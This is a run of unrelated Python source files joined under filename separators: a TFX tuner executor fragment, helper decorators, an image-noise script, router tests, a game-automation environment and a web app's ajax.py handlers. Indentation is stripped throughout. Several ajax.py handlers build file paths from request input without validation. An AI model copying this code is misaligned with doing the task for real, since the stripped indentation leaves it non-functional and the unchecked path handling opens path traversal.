logging.info('Initializing cluster spec... ')
cluster_spec = json.loads(os.environ.get('CLUSTER_SPEC', '{}'))
# If CLUSTER_SPEC is not present, assume single-machine tuning.
if not cluster_spec:
return
self._master_addr, self._master_port = (
# We rely on Cloud AI Platform Training service's specification whereby
# there will be no more than one master replica.
# https://cloud.google.com/ai-platform/training/docs/distributed-training-containers#cluster-spec-format
cluster_spec['cluster']['master'][0].split(':'))
self._tuner_id = (
'tfx-tuner-%s-%d' % (
cluster_spec['task']['type'], # 'master' or 'worker'
cluster_spec['task']['index'] # zero-based index
))
logging.info('Tuner ID is: %s', self._tuner_id)
self._is_chief = cluster_spec['task']['type'] == 'master'
logging.info('Cluster spec initalized with: %s', cluster_spec)
def __del__(self):
self._close()
def _close(self) -> None:
"""Kills the chief oracle sub-process, if still running."""
if self._chief_process and self._chief_process.is_alive():
logging.info('Terminating chief oracle at PID: %s',
self._chief_process.pid)
self._chief_process.terminate()
def Do(self, input_dict: Dict[Text, List[types.Artifact]],
output_dict: Dict[Text, List[types.Artifact]],
exec_properties: Dict[Text, Any]) -> None:
tuner = self._search(input_dict, exec_properties)
if self._tuner_id is not None and not self._is_chief:
logging.info('Returning since this is not chief worker.')
return
tuner_executor.write_best_hyperparameters(tuner, output_dict)
self._close()
|
decorators.py
|
import threading
def start_thread(func):
def wrapped(*args, **kwargs):
thread = threading.Thread(target=func, args=args, kwargs=kwargs, daemon=True)
thread.start()
return thread
return wrapped
def standart_position_output(func):
""""""
def wrapped(self):
point = {}
rotation = {}
for axis, value in zip(['x', 'y', 'z'], func(self)['position'][:3]):
point.update({axis: value})
for rot, value in zip(['roll', 'pitch', 'yaw'], func(self)['position'][3:]):
rotation.update({rot: value})
try:
ref_frame = {'point': point, 'rotation': rotation, 'timestamp': func(self)['timestamp']}
except KeyError:
return {'point': point, 'rotation': rotation}
return ref_frame
return wrapped
|
generate_LR_noise.py
|
import os
import numpy as np
import cv2
import sys
from multiprocessing import Process
kIMG_FILES = ['png', 'jpeg', 'jpg', 'bmp', 'tiff']
def genNoise(sigma, input_fld):
output_fld = os.path.join(sys.argv[3], 'n_{}'.format(sigma))
os.makedirs(output_fld, exist_ok=True)
imgs_path_list = [x for x in os.listdir(input_fld) if x.split('.')[-1].lower() in kIMG_FILES]
imgs_path_list.sort()
for img_p in imgs_path_list:
print('\rSigma:{}, Img:{}'.format(sigma, img_p), end='')
img = cv2.imread(os.path.join(input_fld, img_p)) / 255
h, w, c = img.shape
noise_kernel = np.random.normal(0, sigma / 255, (h, w, c))
n_img = img + noise_kernel
n_img[n_img > 1] = 1
n_img[n_img < 0] = 0
n_img = (n_img * 255).astype(np.uint8)
cv2.imwrite(os.path.join(output_fld, img_p), n_img)
print()
def main():
sigmas = [int(x) for x in sys.argv[1].split(',')]
input_fld = sys.argv[2]
all_proc = []
for sigma in sigmas:
all_proc.append(Process(target=genNoise,args=(sigma, input_fld)))
all_proc[-1].start()
for p in all_proc:
p.join()
print("Done")
if __name__ == '__main__':
if len(sys.argv) == 1:
print("[Sigma levels(csv)] [input folder] [output folder]")
exit()
main()
|
test_router.py
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import time
import threading
from nose.tools import assert_equals, assert_raises
from ..backends.base import BackendBase
from ..apps.base import AppBase
from ..router import Router
def test_router_finds_apps():
router = Router()
router.add_app("rapidsms.contrib.default")
from rapidsms.contrib.default.app import App
assert_equals(len(router.apps), 1)
app = router.get_app("rapidsms.contrib.default")
assert_equals(type(app), App)
def test_router_returns_none_on_invalid_apps():
assert_equals(Router().get_app("not.a.valid.app"), None)
def test_router_raises_on_uninstalled_apps():
assert_raises(KeyError, Router().get_app, "rapidsms.contrib.default")
def test_router_starts_and_stops_apps_and_backends():
class MockApp(AppBase):
def start(self):
self.started = True
def stop(self):
self.stopped = True
class MockBackend(BackendBase):
def start(self):
self.started = True
BackendBase.start(self)
def stop(self):
self.stopped = True
BackendBase.stop(self)
router = Router()
app = MockApp(router)
router.apps.append(app)
backend = MockBackend(router, "mock")
router.backends["mock"] = backend
assert hasattr(app, 'started') == False
assert hasattr(app, 'stopped') == False
assert hasattr(backend, 'started') == False
assert hasattr(backend, 'stopped') == False
# start in a separate thread, so we can test it asynchronously.
worker = threading.Thread(target=router.start)
worker.daemon = True
worker.start()
# wait until the router has started.
while not router.running:
time.sleep(0.1)
assert_equals(app.started, True)
assert_equals(backend.started, True)
assert hasattr(app, 'stopped') == False
assert hasattr(backend, 'stopped') == False
# wait until the router has stopped.
router.stop()
worker.join()
assert_equals(app.started, True)
assert_equals(app.stopped, True)
assert_equals(backend.started, True)
assert_equals(backend.stopped, True)
|
DownGame.py
|
import pdb
import mss
import time
import numpy as np
from time import sleep
from torchvision import transforms
import os
import cv2
import subprocess
from xvfbwrapper import Xvfb
from pynput.keyboard import Controller, Key
from multiprocessing import Pipe, Process
from transitions import Machine, State
from .DownConst import ACTIONS, TOP, LEFT, HEIGHT, WIDTH, LOSE_COLOR, LOSE_LOCATION, PLAYER_COLOR, PLAYFORM_COLOR, PIKE_COLOR, N_PLATFORMS
def down_client(conn):
monitor = {"top": TOP, "left": LEFT, "width": WIDTH, "height": HEIGHT}
def press_and_release(keyboard, keys, holdtime=0.1):
for key in keys:
keyboard.press(key)
time.sleep(holdtime)
for key in keys:
keyboard.release(key)
def start_wine():
subprocess.Popen([r"wine", r"down.exe"])
time.sleep(4)
echo_arg = os.environ['DISPLAY']
echo = subprocess.run(
["echo", echo_arg],
stdout=subprocess.PIPE,
check=True,
)
display_id = echo.stdout[1:-1]
print(int(display_id))
xdp = subprocess.run(
["xdotool", "search", "--name", "NS-SHAFT"],
stdout=subprocess.PIPE,
check=True,
)
window_id = xdp.stdout
# adjust window position
cmd = ["xdotool", "windowmove", window_id, "0", "0"]
subprocess.run(cmd, check=True)
def start_game(keyboard, sct):
img = np.array(sct.grab(monitor))
conn.send(img)
with Xvfb(width=WIDTH, height=WIDTH):
# create instance in current desktop
keyboard = Controller()
sct = mss.mss()
# initialize game
start_wine()
start_game(keyboard, sct)
# wait actions
while True:
press_flow = conn.recv()
if press_flow != "UPDATE":
for keys in press_flow:
press_and_release(keyboard, keys=keys)
img = np.array(sct.grab(monitor))
conn.send(img)
class DownGame(object):
def _spawn_down(self):
parent_conn, child_conn = Pipe()
p = Process(target=down_client, args=(child_conn,))
p.start()
return parent_conn, parent_conn.recv()
def __init__(self):
self.actions = ACTIONS
self.parent_conn, self.screenshot = self._spawn_down()
self.FSM = self._init_FSM()
# print(self.FSM.is_gaming())
print("-- client ready")
def take_action(self, idx):
action = self.actions[idx]
# print(self.FSM.state, action)
self.parent_conn.send([action])
self.screenshot = self.parent_conn.recv()
def toggle_start(self):
sleep(0.1)
self.parent_conn.send([("s",)])
self.screenshot = self.parent_conn.recv()
while True:
self.parent_conn.send([("s",)])
self.screenshot = self.parent_conn.recv()
if not (self.screenshot[LOSE_LOCATION[0]][LOSE_LOCATION[1]] == LOSE_COLOR).all():
break
sleep(0.01)
self.FSM.play()
def observe(self):
done = False
if (self.screenshot[LOSE_LOCATION[0]][LOSE_LOCATION[1]] == LOSE_COLOR).all() and self.FSM.is_gaming():
self.FSM.wait()
done = True
return np.zeros(N_PLATFORMS*3+2), -10, done
player = np.where(self.screenshot == PLAYER_COLOR)
pikes = np.where(self.screenshot == PLAYFORM_COLOR)
platforms = np.where(self.screenshot == PIKE_COLOR)
items = list()
# 0 is empty, 1 is pikes, 2 is platforms
for i in range(len(pikes[0])):
items.append((pikes[0][i], pikes[1][i], 1))
for i in range(len(platforms[0])):
items.append((platforms[0][i], platforms[1][i], 1))
if len(player[0]) > 0:
self.player_pos = player[0][0], player[1][0]
items.sort()
items += [[0,0,0]] * N_PLATFORMS
items = items[:N_PLATFORMS]
items = np.asarray(items)
result = np.asarray([self.player_pos[0], self.player_pos[1]])
items = items.reshape(-1)
result = np.concatenate((result, items)).astype("float32")
img = cv2.cvtColor(self.screenshot, cv2.COLOR_RGB2GRAY)
img = transforms.ToTensor()(img).float()
return result, 1 + self.player_pos[0] / 100, done
def _update_screenshot(self):
self.parent_conn.send("s")
self.screenshot = self.parent_conn.recv()
def _init_FSM(self):
states = [
State(name='waiting', on_enter=[], on_exit=[]),
State(name='gaming', on_enter=[], on_exit=[]),
]
transitions = [
{'trigger': 'wait', 'source': 'gaming', 'dest': 'waiting'},
{'trigger': 'play', 'source': 'waiting', 'dest': 'gaming'},
]
return DownGameState(states, transitions, 'waiting')
class DownGameState(object):
def __init__(self, states, transitions, initial_state):
self.machine = Machine(model=self,
states=states,
transitions=transitions,
initial=initial_state)
|
ajax.py
|
import json
import logging
import os
import threading
import time
import cherrypy
import datetime
import core
from core import config, library, searchresults, searcher, snatcher, notification, plugins, downloaders
from core.library import Metadata, Manage
from core.movieinfo import TheMovieDatabase, YouTube
from core.providers import torrent, newznab
from core.helpers import Conversions
import backup
from gettext import gettext as _
logging = logging.getLogger(__name__)
class Errors():
''' Namespace for common error messages used in AJAX responses '''
database_write = _('Unable to write to database.')
database_read = _('Unable to read {} details from database.')
tmdb_not_found = _('Unable to find {} on TheMovieDB.')
class Ajax(object):
''' These are all the methods that handle ajax post/get requests from the browser.
Except in special circumstances, all should return an 'ajax-style response', which is a
dict with a response key to indicate success, and additional keys for expected data output.
For example {'response': False, 'error': 'something broke'}
{'response': True, 'results': ['this', 'is', 'the', 'output']}
'''
@cherrypy.expose
@cherrypy.tools.json_out()
def library(self, sort_key, sort_direction, limit=50, offset=0, status=None, category=None):
''' Get 50 movies from library
sort_key (str): column name to sort by
sort_direction (str): direction to sort [ASC, DESC]
limit: int number of movies to get <optional - default 50>
offset: int list index postition to start slice <optional - default 0>
status (list): filter movies with these statuses only <optional>
category (str): filter movies with this category only <optional>
Gets a movies slice, length by limit, from library sorted by sort key
Returns list of dicts of movies
'''
if status and not isinstance(status, list):
status = [status]
if status and 'Finished' in status:
status.append('Disabled')
return core.sql.get_user_movies(sort_key, sort_direction.upper(), limit, offset, status, category)
@cherrypy.expose
@cherrypy.tools.json_out()
def library_counters(self, category=None):
''' Get movies counters group by status, filtered by category
category (str): Count movies with this category <optional>
'''
status_count = core.sql.get_library_count('status', 'category', category)
status_count['Finished'] = status_count.get('Finished', 0) + status_count.get('Disabled', 0)
if 'Disabled' in status_count:
del status_count['Disabled']
return status_count
@cherrypy.expose
@cherrypy.tools.json_out()
def search_tmdb(self, search_term):
''' Search tmdb for movies
search_term (str): title and year of movie (Movie Title 2016)
Returns list of dicts that contain tmdb's data.
'''
results = TheMovieDatabase.search(search_term)
if results:
Manage.add_status_to_search_movies(results)
else:
logging.info('No Results found for {}'.format(search_term))
return results
@cherrypy.expose
@cherrypy.tools.json_out()
def tmdb_categories(self, cat, tmdbid=None):
''' Get categories of movies from TMDB
Returns list of dicts of movies
'''
results = TheMovieDatabase.get_category(cat, tmdbid)[:8]
if results:
Manage.add_status_to_search_movies(results)
else:
logging.info('No Results found for {}'.format(cat))
return results
@cherrypy.expose
@cherrypy.tools.json_out()
def quick_titles(self):
return core.sql.quick_titles()
@cherrypy.expose
@cherrypy.tools.json_out()
def get_search_results(self, imdbid, quality=None):
''' Gets search results for movie
imdbid (str): imdb id #
quality (str): quality profile for movie <optional - default None>
Passes request to sql.get_search_results() then filters out unused download methods.
Returns dict ajax-style response
'''
results = core.sql.get_search_results(imdbid, quality=quality, rejected=True)
if not core.CONFIG['Downloader']['Sources']['usenetenabled']:
results = [res for res in results if res.get('type') != 'nzb']
if not core.CONFIG['Downloader']['Sources']['torrentenabled']:
results = [res for res in results if res.get('type') != 'torrent']
if not results:
ne = core.scheduler_plugin.task_list['Movie Search'].next_execution
ne = Conversions.human_datetime(ne) if ne else '[Disabled]'
return {'response': False, 'next': ne}
else:
for i in results:
i['size'] = Conversions.human_file_size(i['size'])
return {'response': True, 'results': results}
@cherrypy.expose
def get_trailer(self, title, year):
''' Gets trailer embed url from youtube
title (str): title of movie
year (str/int): year of movie release
Returns str
'''
return YouTube.trailer('{} {}'.format(title, year))
@cherrypy.expose
@cherrypy.tools.json_out()
def add_wanted_movie(self, data):
''' Adds movie to library
data (str): json-formatted dict of known movie data
Calls library.Manage.add_movie to add to library.
Returns dict ajax-style response
'''
movie = json.loads(data)
response = Manage.add_movie(movie, full_metadata=False)
if response['response'] and core.CONFIG['Search']['searchafteradd'] and movie['year'] != 'N/A':
threading.Thread(target=searcher._t_search_grab, args=(movie,)).start()
return response
@cherrypy.expose
@cherrypy.tools.json_out()
def save_settings(self, data):
''' Saves settings to config file
data (dict): of Section with nested dict of keys and values:
{'Section': {'key': 'val', 'key2': 'val2'}, 'Section2': {'key': 'val'}}
All dicts must contain the full tree or data will be lost.
Fires off additional methods if neccesary, ie scheduler restart/reloads
Returns dict ajax-style response
'''
logging.info('Saving settings.')
data = json.loads(data)
save_data = {}
for key in data:
if data[key] != core.CONFIG[key]:
save_data[key] = data[key]
if not save_data:
return {'response': True, 'message': _('Settings saved.')}
try:
config.write(save_data)
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e:
logging.error('Writing config.', exc_info=True)
return {'response': False, 'error': _('Unable to write to config file.')}
return {'response': True, 'message': _('Settings saved.')}
@cherrypy.expose
@cherrypy.tools.json_out()
def remove_movie(self, imdbid):
''' Removes movie
imdbid (str): imdb id #
Returns dict ajax-style response
'''
return Manage.remove_movie(imdbid)
@cherrypy.expose
@cherrypy.tools.json_out()
def delete_movie_file(self, imdbid):
''' Deletes movie file for imdbid
imdbid (str): imdb id #
Returns dict ajax-style response
'''
logging.info('Deleting file for {}.'.format(imdbid))
f = core.sql.get_movie_details('imdbid', imdbid).get('finished_file')
try:
logging.debug('Finished file for {} is {}'.format(imdbid, f))
if os.path.exists(f):
os.unlink(f)
core.sql.update_multiple_values('MOVIES', {'finished_date': None, 'finished_score': None, 'finished_file': None}, 'imdbid', imdbid)
return {'response': True, 'message': _('Deleted movie file {}.').format(f)}
except Exception as e:
logging.error('Unable to delete file {}'.format(f), exc_info=True)
return {'response': False, 'error': str(e)}
@cherrypy.expose
@cherrypy.tools.json_out()
def search(self, imdbid):
''' Search indexers for specific movie.
imdbid (str): imdb id #
Gets movie data from database and sends to searcher.search()
Returns dict ajax-style response
'''
logging.info('Starting user-requested backlog search for {}'.format(imdbid))
movie = core.sql.get_movie_details('imdbid', imdbid)
if not movie:
return {'response': False, 'error': Errors.database_read.format(imdbid)}
else:
success = searcher.search(imdbid, movie['title'], movie['year'], movie['quality'])
status = core.sql.get_movie_details('imdbid', imdbid)['status']
if success:
results = core.sql.get_search_results(imdbid, movie['quality'], rejected=True)
for i in results:
i['size'] = Conversions.human_file_size(i['size'])
r = {'response': True, 'results': results, 'movie_status': status}
if len(results) == 0:
ne = core.scheduler_plugin.task_list['Movie Search'].next_execution
r['next'] = Conversions.human_datetime(ne) if ne else '[Disabled]'
return r
else:
return {'response': False, 'error': Errors.database_read.format(imdbid), 'movie_status': status}
@cherrypy.expose
@cherrypy.tools.json_out()
def manual_download(self, year, guid, kind):
''' Sends search result to downloader manually
guid (str): download link for nzb/magnet/torrent file.
kind (str): type of download (torrent, magnet, nzb)
Returns dict ajax-style response
'''
torrent_enabled = core.CONFIG['Downloader']['Sources']['torrentenabled']
usenet_enabled = core.CONFIG['Downloader']['Sources']['usenetenabled']
if kind == 'nzb' and not usenet_enabled:
return {'response': False, 'error': _('Link is NZB but no Usent client is enabled.')}
elif kind in ('torrent', 'magnet') and not torrent_enabled:
return {'response': False, 'error': _('Link is Torrent/Magnet but no Torrent client is enabled.')}
data = dict(core.sql.get_single_search_result('guid', guid))
if data:
data['year'] = year
return snatcher.download(data)
else:
return {'response': False, 'error': Errors.database_read.format(kind)}
@cherrypy.expose
@cherrypy.tools.json_out()
def mark_bad(self, guid, imdbid, cancel_download=False):
''' Marks guid as bad in SEARCHRESULTS and MARKEDRESULTS
guid (str): guid of download to mark
imdbid (str): imdb id # of movie
cancel_download (bool): send command to download client to cancel download
Returns dict ajax-style response
'''
sr_orig = core.sql.get_single_search_result('guid', guid)
sr = Manage.searchresults(guid, 'Bad')
Manage.markedresults(guid, 'Bad', imdbid=imdbid)
if sr:
response = {'response': True, 'message': _('Marked release as Bad.')}
else:
response = {'response': False, 'error': Errors.database_write}
response['movie_status'] = Manage.movie_status(imdbid)
if not response['movie_status']:
response['error'] = (Errors.database_write)
response['response'] = False
if cancel_download:
cancelled = False
if sr_orig.get('status') != 'Snatched':
return response
client = sr_orig['download_client'] if sr_orig else None
downloadid = sr_orig['downloadid'] if sr_orig else None
if not client:
logging.info('Download client not found, cannot cancel download.')
return response
else:
cancelled = getattr(downloaders, client).cancel_download(downloadid)
if not cancelled:
response['response'] = False
response['error'] = response.get('error', '') + _(' Could not remove download from client.')
return response
@cherrypy.expose
@cherrypy.tools.json_out()
def unmark_bad(self, guid, imdbid):
''' Removes bad mark for guid in SEARCHRESULTS and MARKEDRESULTS
guid (str): guid of download to mark
imdbid (str): imdb id # of movie
Returns dict ajax-style response
'''
logging.info('Removing {} from MARKEDRESULTS.'.format(guid.split('&')[0]))
if not core.sql.delete('MARKEDRESULTS', 'guid', guid):
logging.info('Removing MARKEDRESULTS {} failed.'.format(guid.split('&')[0]))
return {'response': False, 'error': Errors.database_write}
else:
logging.info('Successfully removed {} from MARKEDRESULTS.'.format(guid.split('&')[0]))
sr = Manage.searchresults(guid, 'Available')
if sr:
response = {'response': True, 'message': _('Marked release as Available.')}
else:
response = {'response': False, 'error': Errors.database_write}
response['movie_status'] = Manage.movie_status(imdbid)
if not response['movie_status']:
response['error'] = (Errors.database_write)
response['response'] = False
return response
@cherrypy.expose
def notification_remove(self, index):
''' Removes notification from core.notification
index (str/int): index of notification to remove
'index' will be of type string since it comes from ajax request.
Therefore we convert to int here before passing to Notification
Simply calls Notification module.
Does not return
'''
notification.remove(int(index))
return
@cherrypy.expose
@cherrypy.tools.json_out()
def update_check(self):
''' Manually check for updates
Returns list:
[0] dict ajax-style response
[1] dict of core notifications
'''
response = core.updater.update_check()
if response['status'] == 'current':
n = [[{'message': _('No updates available.')}, {'type': 'primary'}]]
return [response, n]
else:
return [response, core.NOTIFICATIONS]
@cherrypy.expose
@cherrypy.tools.json_out()
def test_downloader_connection(self, mode, data):
''' Test connection to downloader.
mode (str): which downloader to test.
data (dict): connection information (url, port, login, etc)
Executes staticmethod in the chosen downloader's class.
Returns dict ajax-style response
'''
response = {}
data = json.loads(data)
test = getattr(downloaders, mode).test_connection(data)
if test is True:
response['response'] = True
response['message'] = _('Connection successful.')
else:
response['response'] = False
response['error'] = test
return response
@cherrypy.expose
def server_status(self, mode):
''' Check or modify status of CherryPy server_status
mode (str): command or request of state
Restarts or Shuts Down server in separate thread.
Delays by one second to allow browser to redirect.
If mode == 'online', asks server for status.
(ENGINE.started, ENGINE.stopped, etc.)
Returns nothing for mode == restart || shutdown
Returns str server state if mode == online
'''
if mode == 'restart':
threading.Timer(1, core.restart).start()
return
elif mode == 'shutdown':
threading.Timer(1, core.shutdown).start()
return
elif mode == 'online':
return str(cherrypy.engine.state)
@cherrypy.expose
def update_server(self, mode):
''' Starts and executes update process.
mode (str): 'set_true' or 'update_now'
This method has two major functions based on mode
set_true:
Sets core.UPDATING to True, the browser should then automatically redirect
the user to the update page that calls update_server('update_now')
update_now:
Starts update process:
* Stops task scheduler to cancel all Timers
* Waits for in-process tasks to finish. Yields to browser a list of
currently-running tasks every 1.5 seconds
* Yields updating message to browser. Calls update method
* Sets core.UPDATING to False
* Yields response from update method to browser
If False, starts scheduler plugin again to get back to a normal state
If True, calls restart method. Browser is responsible for redirecting
afer the server is back up.
Returns dict ajax-style response
'''
if mode == 'set_true':
core.UPDATING = True
return json.dumps({'response': True})
if mode == 'update_now':
logging.info('Update process started.')
core.scheduler_plugin.stop()
active_tasks = [k for k, v in core.scheduler_plugin.task_list.items() if v.running]
while len(active_tasks) > 0:
yield json.dumps({'response': True, 'status': 'waiting', 'active_tasks': active_tasks})
active_tasks = [k for k, v in core.scheduler_plugin.task_list.items() if v.running]
time.sleep(1.5)
yield json.dumps({'response': True, 'status': 'updating'})
update_status = core.updater.execute_update()
core.UPDATING = False
if update_status is False:
logging.error('Update Failed.')
yield json.dumps({'response': False, 'error': _('Unable to complete update.')})
core.scheduler_plugin.restart()
elif update_status is True:
yield json.dumps({'response': True, 'status': 'complete'})
self.server_status('restart')
else:
return json.dumps({'response': False})
update_server._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def update_movie_options(self, quality, category, status, filters, imdbid):
''' Updates quality settings for individual title
quality (str): name of new quality
status (str): management state ('automatic', 'disabled')
filters (str): JSON.stringified dict of filter words
imdbid (str): imdb identification number
Returns dict ajax-style response
'''
success = {'response': True, 'message': _('Movie options updated.')}
logging.info('Setting Quality and filters for {}.'.format(imdbid))
if not core.sql.update_multiple_values('MOVIES', {'quality': quality, 'category': category, 'filters': filters}, 'imdbid', imdbid):
return {'response': False, 'error': Errors.database_write}
logging.info('Updating status to {} for {}.'.format(status, imdbid))
if status == 'Automatic':
if not core.sql.update('MOVIES', 'status', 'Waiting', 'imdbid', imdbid):
return {'response': False, 'error': Errors.database_write}
new_status = Manage.movie_status(imdbid)
if not new_status:
return {'response': False, 'error': Errors.database_write}
else:
success['status'] = new_status
return success
elif status == 'Disabled':
if not core.sql.update('MOVIES', 'status', 'Disabled', 'imdbid', imdbid):
return {'response': False, 'error': Errors.database_write}
else:
success['status'] = 'Disabled'
return success
@cherrypy.expose
def get_log_text(self, logfile):
''' Gets log file contents
logfile (str): name of log file to read
logfile should be filename only, not the path to the file
Returns str
'''
logging.info('Dumping log file {} to text.'.format(logfile))
with open(os.path.join(core.LOG_DIR, logfile), 'r') as f:
log_text = ''.join(reversed(f.readlines()))
return log_text
@cherrypy.expose
@cherrypy.tools.json_out()
def indexer_test(self, indexer, apikey, mode):
''' Tests connection to newznab indexer
indexer (str): url of indexer
apikey (str): indexer's api key
mode (str): newznab or torznab
Returns dict ajax-style response
'''
if mode == 'newznab':
return newznab.NewzNab.test_connection(indexer, apikey)
elif mode == 'torznab':
return torrent.Torrent.test_connection(indexer, apikey)
else:
return {'response': False, 'error': _('Invalid test mode.')}
@cherrypy.expose
@cherrypy.tools.json_out()
def get_plugin_conf(self, folder, conf):
''' Calls plugin_conf_popup to render html
folder (str): folder to read config file from
conf (str): filename of config file (ie 'my_plugin.conf')
Returns string
'''
c = os.path.join(core.PLUGIN_DIR, folder, conf)
logging.info('Reading plugin config {}'.format(c))
try:
with open(c) as f:
config = json.load(f)
except Exception as e:
logging.error('Unable to read config file.', exc_info=True)
return ''
return plugins.render_config(config)
@cherrypy.expose
@cherrypy.tools.json_out()
def save_plugin_conf(self, folder, filename, config):
''' Calls plugin_conf_popup to render html
folder (str): folder to store config file
filename (str): filename of config file (ie 'my_plugin.conf')
config (str): json data to store in conf file
Returns dict ajax-style response
'''
conf_file = os.path.join(core.PROG_PATH, core.PLUGIN_DIR, folder, filename)
logging.info('Saving plugin config as {}'.format(conf_file))
config = json.loads(config)
response = {'response': True, 'message': _('Settings saved.')}
try:
with open(conf_file, 'w') as output:
json.dump(config, output, indent=2)
except Exception as e:
response = {'response': False, 'error': str(e)}
return response
@cherrypy.expose
def scan_library_directory(self, directory, minsize, recursive, skipduplicatedirs, maxresults):
''' Calls library to scan directory for movie files
directory (str): directory to scan
minsize (str/int): minimum file size in mb, coerced to int
recursive (bool): whether or not to search subdirs
skipduplicatedirs (bool): whether or not to skip duplicate dirs
maxresults (str/int): maximum result count, coerced to int
Finds all files larger than minsize in directory.
Removes all movies from gathered list that are already in library.
If error, yields {'error': reason} and stops Iteration
If movie has all metadata, yields:
{'complete': {<metadata>}}
If missing imdbid or resolution, yields:
{'incomplete': {<knownn metadata>}}
All metadata dicts include:
'path': 'absolute path to file'
'progress': '10 of 250'
Yeilds dict ajax-style response
'''
recursive = json.loads(recursive)
minsize = int(minsize)
# Note - do not limit the result set here, or we might get stuck looking at files we already have
files = core.library.ImportDirectory.scan_dir(directory, minsize, recursive)
if files.get('error'):
yield json.dumps({'error': files['error']})
raise StopIteration()
user_movies = core.sql.get_user_movies()
library_files = [i['finished_file'] for i in user_movies]
library = [i['imdbid'] for i in user_movies]
files = [file for file in files['files'] if file not in library_files]
skipduplicatedirs = json.loads(skipduplicatedirs)
if skipduplicatedirs:
# Build dict of dir:[files]
library_file_dirs = {}
for f in library_files:
if f:
fd = os.path.dirname(f)
library_file_dirs.setdefault(fd, []).append(f)
# Log all possible duplicate dirs to help with manual maintenance
for f in files:
fd = os.path.dirname(f)
if fd in library_file_dirs:
logging.info('## {} directory already in library'.format(f))
for x in library_file_dirs[fd]:
logging.info('## {}'.format(x))
# Remove the files which have duplicate dirs (likely to be the same imdbid)
# This avoids doing a metadata probe which is then ignored
files = [f for f in files if os.path.dirname(f) not in library_file_dirs]
# We do not need the dict any more, so release the memory
del library_file_dirs
# Limit the number of results
# We do this here instead of at the scan so we skip files we have already imported
maxresults = int(maxresults)
if maxresults and maxresults > 0:
files = files[0:maxresults]
length = len(files)
if length == 0:
yield json.dumps({'response': None})
raise StopIteration()
logging.info('Parsing {} directory scan results.'.format(length))
for index, path in enumerate(files):
logging.info('Gathering metatadata for {}'.format(path))
metadata = {}
response = {'progress': [index + 1, length]}
try:
metadata = Metadata.from_file(path)
if not metadata.get('imdbid'):
metadata['imdbid'] = ''
logging.info('IMDB unknown for import {}'.format(metadata['title']))
response['response'] = 'incomplete'
elif metadata['imdbid'] in library:
logging.info('{} ({}) already in library, ignoring.'.format(metadata['title'], path))
response['response'] = 'in_library'
# Log all possible duplicate files to help with manual maintenance
for i in user_movies:
if i['imdbid'] == metadata['imdbid']:
logging.info('## {} {}'.format(i['imdbid'], i['finished_file']))
elif not metadata.get('resolution'):
logging.info('Resolution/Source unknown for import {}'.format(metadata['title']))
response['response'] = 'incomplete'
else:
logging.info('All data found for import {}'.format(metadata['title']))
response['response'] = 'complete'
if response['response'] == 'complete':
p = metadata.get('poster_path')
r = metadata.get('resolution')
metadata = Metadata.convert_to_db(metadata)
metadata['poster_path'] = p
metadata['resolution'] = r
metadata['size'] = os.path.getsize(path)
metadata['human_size'] = Conversions.human_file_size(metadata['size'])
metadata['finished_file'] = path
if response['response'] == 'in_library':
metadata = {'title': metadata['title']}
response['movie'] = metadata
yield json.dumps(response)
except Exception as e:
logging.warning('Error gathering metadata.', exc_info=True)
yield json.dumps({'response': 'incomplete', 'movie': metadata})
continue
scan_library_directory._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def import_dir(self, movies, corrected_movies):
''' Imports list of movies in data
movie_data (list): dicts of movie info ready to import
corrected_movies (list): dicts of user-corrected movie info
corrected_movies must be [{'/path/to/file': {'known': 'metadata'}}]
Iterates through corrected_movies and attmpts to get metadata again if required.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yeilds dict ajax-style response
'''
logging.info('Adding directory scan movies to library.')
today = str(datetime.date.today())
movie_data = json.loads(movies)
corrected_movies = json.loads(corrected_movies)
fake_results = []
success = []
length = len(movie_data) + len(corrected_movies)
progress = 1
if corrected_movies:
logging.info('{} corrected movies, gathering metadata.'.format(len(corrected_movies)))
for data in corrected_movies:
tmdbdata = TheMovieDatabase._search_tmdbid(data['tmdbid'])
if tmdbdata:
tmdbdata = tmdbdata[0]
data['year'] = tmdbdata['release_date'][:4]
data.update(tmdbdata)
movie_data.append(data)
else:
logging.error('Unable to find {} on TMDB.'.format(data['tmdbid']))
yield json.dumps({'response': False, 'movie': data, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(data['tmdbid'])})
progress += 1
logging.info('Adding {} directory scan movies to library.'.format(len(movie_data)))
for movie in movie_data:
if movie.get('imdbid'):
movie['status'] = 'Disabled'
movie['predb'] = 'found'
movie['origin'] = 'Directory Import'
movie['finished_date'] = today
movie['id'] = movie['tmdbid']
response = Manage.add_movie(movie, full_metadata=True)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
else:
logging.error('Unable to find {} on TMDB.'.format(movie['title']))
logging.debug(movie)
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(data['title'])})
progress += 1
fake_results = searchresults.score(fake_results, imported=True)
for i in success:
for r in fake_results:
if r['imdbid'] == i['imdbid']:
core.sql.update('MOVIES', 'finished_score', r['score'], 'imdbid', i['imdbid'])
break
core.sql.write_search_results(fake_results)
import_dir._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def list_files(self, current_dir, move_dir):
''' Lists files in directory
current_dir (str): base path
move_dir (str): child path to read
Joins and normalizes paths:
('/home/user/movies', '..')
Becomes /home/user
Returns dict ajax-style response
'''
current_dir = current_dir.strip()
move_dir = move_dir.strip()
response = {}
new_path = os.path.normpath(os.path.join(current_dir, move_dir))
response['new_path'] = new_path
try:
response['list'] = [i for i in os.listdir(new_path) if os.path.isdir(os.path.join(new_path, i)) and not i.startswith('.')]
response['list'].sort()
except Exception as e:
response = {'error': str(e)}
logging.error('Error listing directory.', exc_info=True)
return response
@cherrypy.expose
@cherrypy.tools.json_out()
def update_metadata(self, imdbid, tmdbid=None):
''' Re-downloads metadata for imdbid
imdbid (str): imdbid of movie
tmdbid (str): tmdbid of movie <optional - default None>
If tmdbid is None, looks in database for tmdbid using imdbid.
If that fails, looks on tmdb api for imdbid
If that fails returns error message
